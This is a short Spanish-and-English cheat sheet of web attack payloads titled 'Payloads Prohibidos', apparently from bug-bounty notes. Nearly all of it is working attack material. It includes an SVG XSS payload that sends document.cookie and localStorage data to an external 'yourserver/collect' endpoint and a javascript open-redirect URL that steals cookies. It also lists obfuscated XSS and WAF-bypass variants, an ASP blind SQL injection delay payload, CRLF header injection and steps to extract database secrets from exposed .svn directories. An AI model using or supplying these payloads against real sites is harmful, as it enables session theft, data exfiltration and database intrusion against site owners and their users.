Payloads Prohibidos

Agregar parámetro return (Se puede usar para open redirection también):

https://xyz.com/?return=javascript://%250Alert(document.location=document.cookie)

https://xyz.com/?return=https://google.com

https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt

📌Here is An XSS Payload that Steals both Cookies and Local Storage Data 🤯

📌Payload <svg/onload='const url = https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}; fetch(url);'>"

🚨Discovering DB secrets in SVN repository🚨

  1. Run ./dirsearch.py -u target -e php,html,js,xml -x 500,403

  2. Found http://url.com/.svn/

  3. Clone & use SVN-Extractor

  4. Run ./svn-extractor.py --url http://url.com --match database.php

⚡ Result in output containing secret.

ASP blind SQL Injection in a Login page⚡️ 👉 (Blind-Boolean method)

✅ Payload: ';%20waitfor%20delay%20'0:0:6'%20--%20

Payload para agregar tag o skill:

<a/href=”j&#97v&#97script:&#97lert(document.cookie)”>ClickMe

XSS payload : <img src%3Dx onerror%3D"\u0061\u006C\u0065\u0072\u0074 (1)">

Bypass 403

both %0d and %0a work

CVE-2022-22978 - Spring Security Admin Bypass PoC

DOM XSS en AVG

#"><img src=x onerror=prompt(0);>

📌If you find a file upload function for an image, try introducing an image with XSS in the filename like so 👇

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
">.svg <alert('xss')a.png

Tech 1:

/?xss=<svg/onload=eval('+URL)>#';alert(document.domain)

cloudflare bypass

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

CRLF

// CRLF to xss
<domain>/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>

Last updated